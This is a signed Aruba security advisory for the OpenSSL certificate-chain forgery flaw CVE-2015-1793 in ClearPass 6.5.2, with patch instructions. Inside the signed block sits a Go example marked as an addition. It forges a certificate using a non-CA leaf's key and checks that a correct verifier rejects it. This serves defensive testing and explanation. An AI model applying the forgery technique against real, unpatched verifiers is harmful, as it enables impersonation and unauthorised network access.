-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Aruba Product Security Advisory
===============================

Advisory ID: ARUBA-PSA-2015-008
CVE: CVE-2015-1793
Publication Date: 2015-Jul-09
Status: Confirmed, Final
Revision: 2

Title
=====

OpenSSL Alternative chains certificate forgery

Overview
========

A high-severity vulnerability exists in OpenSSL. For more details, see
the original OpenSSL advisory at
http://openssl.org/news/secadv_20150709.txt.

Affected
========

-- ClearPass 6.5.2

Unaffected Aruba Products
=========================

-- Other versions of ClearPass
-- ArubaOS (includes controllers and Mobility Access Switch)
-- AirWave
-- Aruba Instant
-- Aruba Central
-- VIA
-- Meridian

Details
=======

On July 9, 2015, the OpenSSL Project reported a high-severity
vulnerability in certain versions of OpenSSL. The vulnerability affects
processing of certificate trust chains: when the first attempt to build
a chain to a trusted root fails, affected versions try to construct an
alternative chain, and an error in that logic can cause checks on
untrusted certificates, such as the CA flag, to be skipped. An attacker
holding any valid end-entity certificate can therefore use it to "issue"
further certificates that an affected verifier accepts as valid.

ClearPass version 6.5.2 was released on June 26, 2015 and contains
OpenSSL version 1.0.1o, one of the affected releases (OpenSSL 1.0.1n,
1.0.1o, 1.0.2b and 1.0.2c are affected; the fix shipped in 1.0.1p and
1.0.2d).

The severity of this vulnerability depends on how ClearPass is being
used:

Use case                                        Severity
----------------------------------------------  ---------------
Authentication with EAP-TLS                     CRITICAL
Management authentication using certificates    CRITICAL
Non-certificate-based authentication            Low

If certificate-based authentication is in use, an attacker could
potentially exploit this vulnerability to gain unauthorized access to
network resources: any client certificate the ClearPass trust store
already accepts can be used to mint further certificates for other
identities.

Resolution
==========

A patch for ClearPass 6.5.2 has been made available to address this
issue. Please use any of the methods listed below to install the patch.

Installing the Patch Online Using the Software Updates Portal:

1. Open ClearPass Policy Manager and go to Administration > Agents and
   Software Updates > Software Updates.
2. In the Firmware and Patch Updates area, find the 'OpenSSL fix for
   CVE-2015-1793' patch and click the Download button in its row.
3. Click Install.
4. When the installation is complete and the status is shown as Needs
   Restart, proceed to restart ClearPass. After reboot, the status for
   the patch will be shown as Installed. The ClearPass Policy Manager
   version number will not change.

Installing the Patch Offline Using the Patch File from
support.arubanetworks.com and HTTP:

1. Download the 'OpenSSL fix for CVE-2015-1793 for ClearPass 6.5.2'
   patch from the Support site.
2. Post the patch file to a local HTTP server.
3. Open an SSH session to the ClearPass appliance using the 'appadmin'
   account.
4. Type 'system update -i '
5. When the installation is complete, issue 'system restart'. After
   reboot, the status for the patch will be shown as Installed. The
   ClearPass Policy Manager version number will not change.

Installing the Patch Offline Using the Patch File from
support.arubanetworks.com and SCP:

1. Download the 'OpenSSL fix for CVE-2015-1793 for ClearPass 6.5.2'
   patch from the Support site.
2. Post the patch file to a local SCP server.
3. Open an SSH session to the ClearPass appliance using the 'appadmin'
   account.
4. Type 'system update -i < user@'
5. When the installation is complete, issue 'system restart'. After
   reboot, the status for the patch will be shown as Installed. The
   ClearPass Policy Manager version number will not change.

Installing the Patch Offline Using the Patch File from
support.arubanetworks.com:

1. Download the 'OpenSSL fix for CVE-2015-1793 for ClearPass 6.5.2'
   patch from the Support site.
2. Open the ClearPass Policy Manager Admin UI and go to Administration >
   Agents and Software Updates > Software Updates.
3. At the bottom of the Firmware and Patch Updates area, click Import
   Updates and browse to the downloaded patch file.
4. Click Install.
5. When the installation is complete and the status is shown as Needs
   Restart, proceed to restart ClearPass. After reboot, the status for
   the patch will be shown as Installed. The ClearPass Policy Manager
   version number will not change.
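The failure mode described under Details, as an added Go example that is not part of this advisory nor of any Aruba or OpenSSL code: a throwaway root CA issues an ordinary client certificate with CA:FALSE, the holder of that certificate signs a second certificate with its private key, and a correctly behaving verifier (Go's crypto/x509 here, standing in for a patched OpenSSL) rejects the second certificate because the only path to the trust anchor runs through a non-CA. All names and keys are placeholders constructed for the example. The PEM output lets the same fixture be fed to another stack, for instance with `openssl verify -CAfile root.pem -untrusted leaf.pem forged.pem`; the correct answer is rejection.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"fmt"
	"math/big"
	"time"
)

// DemoChain is a constructed fixture (placeholder names, throwaway keys):
// a root CA, an end-entity certificate it issued with CA:FALSE, and a
// certificate the end-entity's key signed as though it were a CA, which is
// what CVE-2015-1793 let an attacker pass off as valid.
type DemoChain struct {
	Root, Leaf, Forged *x509.Certificate
}

func newKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return k
}

// issue signs tmpl with the parent's key. x509.CreateCertificate does not
// itself refuse a non-CA parent; enforcing basicConstraints is the verifier's job.
func issue(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, parentKey *ecdsa.PrivateKey) (*x509.Certificate, error) {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, parentKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// template builds a CA template or an ordinary EAP-TLS style client
// certificate template (CA:FALSE, no keyCertSign, clientAuth EKU).
func template(serial int64, cn string, ca bool, now time.Time) *x509.Certificate {
	t := &x509.Certificate{
		SerialNumber: big.NewInt(serial), Subject: pkix.Name{CommonName: cn},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		BasicConstraintsValid: true, IsCA: ca,
		KeyUsage: x509.KeyUsageDigitalSignature,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	}
	if ca {
		t.KeyUsage, t.ExtKeyUsage = x509.KeyUsageCertSign|x509.KeyUsageCRLSign, nil
	}
	return t
}

// BuildDemoChain mints the root, the attacker's legitimate leaf, and the
// certificate the attacker "issues" with that leaf.
func BuildDemoChain() (*DemoChain, error) {
	now := time.Now()
	rootKey, leafKey, forgedKey := newKey(), newKey(), newKey()
	rootTmpl := template(1, "Demo Root CA", true, now)
	root, err := issue(rootTmpl, rootTmpl, &rootKey.PublicKey, rootKey)
	if err != nil {
		return nil, err
	}
	leaf, err := issue(template(2, "attacker@demo.example", false, now), root, &leafKey.PublicKey, rootKey)
	if err != nil {
		return nil, err
	}
	forged, err := issue(template(3, "admin@demo.example", false, now), leaf, &forgedKey.PublicKey, leafKey)
	if err != nil {
		return nil, err
	}
	return &DemoChain{Root: root, Leaf: leaf, Forged: forged}, nil
}

// verify builds a path from cert to root; Go's verifier refuses any path
// whose intermediate lacks CA:TRUE, the check an affected OpenSSL skipped.
func verify(cert *x509.Certificate, intermediates []*x509.Certificate, root *x509.Certificate) error {
	roots, inter := x509.NewCertPool(), x509.NewCertPool()
	roots.AddCert(root)
	for _, c := range intermediates {
		inter.AddCert(c)
	}
	_, err := cert.Verify(x509.VerifyOptions{Roots: roots, Intermediates: inter,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}})
	return err
}

// CheckLeaf returns nil: the attacker's own certificate is genuinely valid.
func (d *DemoChain) CheckLeaf() error { return verify(d.Leaf, nil, d.Root) }

// CheckForged returns an error: the only route to the root is via the CA:FALSE leaf.
func (d *DemoChain) CheckForged() error {
	return verify(d.Forged, []*x509.Certificate{d.Leaf}, d.Root)
}

// PEM renders a certificate so the fixture can be tried against other stacks.
func PEM(c *x509.Certificate) string {
	return string(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: c.Raw}))
}

func main() {
	d, err := BuildDemoChain()
	if err != nil {
		panic(err)
	}
	fmt.Println("leaf:  ", d.CheckLeaf())
	fmt.Println("forged:", d.CheckForged())
	fmt.Print(PEM(d.Root), PEM(d.Leaf), PEM(d.Forged))
}
```

The point for a ClearPass operator is the asymmetry between the two checks: the attacker needs nothing more than a certificate the server already trusts for ordinary authentication, and the forged certificate can name any subject, so with an affected OpenSSL the EAP-TLS or management login of another identity is reachable. Hence the CRITICAL rating for the certificate-based use cases in the table above.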
Obtaining Fixed Software
========================

Aruba customers can obtain software updates on the support website:
http://support.arubanetworks.com

Aruba Support contacts are as follows:

+1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)
+1-408-754-1200 (toll call from anywhere in the world)

The full contact list is at:
http://www.arubanetworks.com/support-services/support-program/contact-support/

e-mail: support(at)arubanetworks.com

Please do not contact "sirt(at)arubanetworks.com" for software upgrades.

Revision History
================

Revision 1.0 / 2015-Jul-09 / Initial release
Revision 2.0 / 2015-Jul-14 / Updated to add resolution instructions.

Aruba SIRT Security Procedures
==============================

Complete information on reporting security vulnerabilities in Aruba
Networks products and on obtaining assistance with security incidents is
available at:
http://www.arubanetworks.com/support-services/security-bulletins/

For reporting *NEW* Aruba Networks security issues, email can be sent to
sirt(at)arubanetworks.com. For sensitive information we encourage the use
of PGP encryption. Our public keys can be found at:
http://www.arubanetworks.com/support-services/security-bulletins/

(c) Copyright 2015 by Aruba Networks, Inc.
This advisory may be redistributed freely after the release date given
at the top of the text, provided that redistributed copies are complete
and unmodified, including all date and version information.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCAAGBQJVpXsvAAoJEJj+CcpFhYbZTHsH/1NMC9ppX3iHMkHMKMy3iqwy
h4c22siYN0TvWPY9FniylBuFgKFfy2S0EuWoYelRoPizm0bR4owMr6UtaLfwfiem
arwRSbm+A4Gb4bX9yFRBtRNdrrSO8J/mvq9gsRYQz0JeRFmI11DsJBEsSpMkoOgV
71VtP8FFLaazsR6rvXoL/zS1jv4fWz++t22cT6bElWrWI2MZU97N5DV2o20bLyaF
lOHU8ESNVR0NS+qutItyY6ao+plwF/nRacXnKzcSc3L8xOl8ulJL2GNpHBEKIReU
TSQ2ChO1t30BeRz0X5qnMzwsyr9cJC7lnWk9YZxX7JZNFOj4tDaJ7SSpN0DWpDk=
=dma1
-----END PGP SIGNATURE-----